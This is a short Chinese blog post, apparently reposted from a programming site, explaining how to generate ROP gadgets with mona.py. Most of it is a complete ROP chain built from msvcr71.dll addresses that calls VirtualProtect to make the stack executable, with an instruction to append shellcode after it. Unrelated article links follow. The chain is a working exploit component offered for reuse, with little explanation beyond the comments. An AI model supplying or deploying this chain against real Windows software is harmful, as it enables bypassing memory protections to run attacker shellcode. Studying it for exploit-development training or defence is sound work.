rop_gadgets使用方法

2024-03-29 08:48
文章标签 使用 方法 rop gadgets

本文主要是介绍rop_gadgets使用方法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

利用mona.py可以生成

!mona rop -m msvcr71.dll -n

这部分gadget能够将后面的shellcode变成可执行的代码段!,后面直接跟shellcode就ok了

rop_gadgets =
[
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x7c37a140,    # Make EAX readable            
    0x7c37591f,    # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
    0x41414141,    # EBP (filler)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x7c37a140,    # <- *&VirtualProtect()
    0x7c3530ea,    # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
    0x7c346c0b,    # Slide, so next gadget would write to correct stack location
    0x7c376069,    # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
    0x41414141,    # EDI (filler)
    0x41414141,    # will be patched at runtime (VP), then picked up into ESI
    0x41414141,    # EBX (filler)
    0x7c376402,    # POP EBP # RETN (msvcr71.dll)
    0x7c345c30,    # ptr to 'push esp #  ret ' (from MSVCR71.dll)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0xfffffdff,    # size 0x00000201 -> ebx, modify if needed
    0x7c351e05,    # NEG EAX # RETN (MSVCR71.dll)
    0x7c354901,    # POP EBX # RETN (MSVCR71.dll)
    0xffffffff,    # pop value into ebx
    0x7c345255,    # INC EBX # FPATAN # RETN (MSVCR71.dll)
    0x7c352174,    # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
    0x7c34d201,    # POP ECX # RETN (MSVCR71.dll)
    0x7c38b001,    # RW pointer (lpOldProtect) (-> ecx)
    0x7c34b8d7,    # POP EDI # RETN (MSVCR71.dll)
    0x7c34b8d8,    # ROP NOP (-> edi)
    0x7c344f87,    # POP EDX # RETN (MSVCR71.dll)
    0xffffffc0,    # value to negate, target value : 0x00000040, target: edx
    0x7c351eb1,    # NEG EDX # RETN (MSVCR71.dll)
    0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)
    0x90909090,    # NOPS (-> eax)
    0x7c378c81,    # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
    # rop chain generated with mona.py
].pack("V*")

这篇关于rop_gadgets使用方法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/858155

相关文章

解决Maven项目idea找不到本地仓库jar包问题以及使用mvn install:install-file

《解决Maven项目idea找不到本地仓库jar包问题以及使用mvninstall:install-file》:本文主要介绍解决Maven项目idea找不到本地仓库jar包问题以及使用mvnin... 目录Maven项目idea找不到本地仓库jar包以及使用mvn install:install-file基

Windows 上如果忘记了 MySQL 密码 重置密码的两种方法

《Windows上如果忘记了MySQL密码重置密码的两种方法》:本文主要介绍Windows上如果忘记了MySQL密码重置密码的两种方法,本文通过两种方法结合实例代码给大家介绍的非常详细,感... 目录方法 1:以跳过权限验证模式启动 mysql 并重置密码方法 2:使用 my.ini 文件的临时配置在 Wi

MySQL重复数据处理的七种高效方法

《MySQL重复数据处理的七种高效方法》你是不是也曾遇到过这样的烦恼:明明系统测试时一切正常,上线后却频频出现重复数据,大批量导数据时,总有那么几条不听话的记录导致整个事务莫名回滚,今天,我就跟大家分... 目录1. 重复数据插入问题分析1.1 问题本质1.2 常见场景图2. 基础解决方案:使用异常捕获3.

最详细安装 PostgreSQL方法及常见问题解决

《最详细安装PostgreSQL方法及常见问题解决》:本文主要介绍最详细安装PostgreSQL方法及常见问题解决,介绍了在Windows系统上安装PostgreSQL及Linux系统上安装Po... 目录一、在 Windows 系统上安装 PostgreSQL1. 下载 PostgreSQL 安装包2.

Python使用getopt处理命令行参数示例解析(最佳实践)

《Python使用getopt处理命令行参数示例解析(最佳实践)》getopt模块是Python标准库中一个简单但强大的命令行参数处理工具,它特别适合那些需要快速实现基本命令行参数解析的场景,或者需要... 目录为什么需要处理命令行参数?getopt模块基础实际应用示例与其他参数处理方式的比较常见问http

SQL中redo log 刷⼊磁盘的常见方法

《SQL中redolog刷⼊磁盘的常见方法》本文主要介绍了SQL中redolog刷⼊磁盘的常见方法,将redolog刷入磁盘的方法确保了数据的持久性和一致性,下面就来具体介绍一下,感兴趣的可以了解... 目录Redo Log 刷入磁盘的方法Redo Log 刷入磁盘的过程代码示例(伪代码)在数据库系统中,r

C 语言中enum枚举的定义和使用小结

《C语言中enum枚举的定义和使用小结》在C语言里,enum(枚举)是一种用户自定义的数据类型,它能够让你创建一组具名的整数常量,下面我会从定义、使用、特性等方面详细介绍enum,感兴趣的朋友一起看... 目录1、引言2、基本定义3、定义枚举变量4、自定义枚举常量的值5、枚举与switch语句结合使用6、枚

使用Python从PPT文档中提取图片和图片信息(如坐标、宽度和高度等)

《使用Python从PPT文档中提取图片和图片信息(如坐标、宽度和高度等)》PPT是一种高效的信息展示工具,广泛应用于教育、商务和设计等多个领域,PPT文档中常常包含丰富的图片内容,这些图片不仅提升了... 目录一、引言二、环境与工具三、python 提取PPT背景图片3.1 提取幻灯片背景图片3.2 提取

Python实现图片分割的多种方法总结

《Python实现图片分割的多种方法总结》图片分割是图像处理中的一个重要任务,它的目标是将图像划分为多个区域或者对象,本文为大家整理了一些常用的分割方法,大家可以根据需求自行选择... 目录1. 基于传统图像处理的分割方法(1) 使用固定阈值分割图片(2) 自适应阈值分割(3) 使用图像边缘检测分割(4)

Java中Switch Case多个条件处理方法举例

《Java中SwitchCase多个条件处理方法举例》Java中switch语句用于根据变量值执行不同代码块,适用于多个条件的处理,:本文主要介绍Java中SwitchCase多个条件处理的相... 目录前言基本语法处理多个条件示例1:合并相同代码的多个case示例2:通过字符串合并多个case进阶用法使用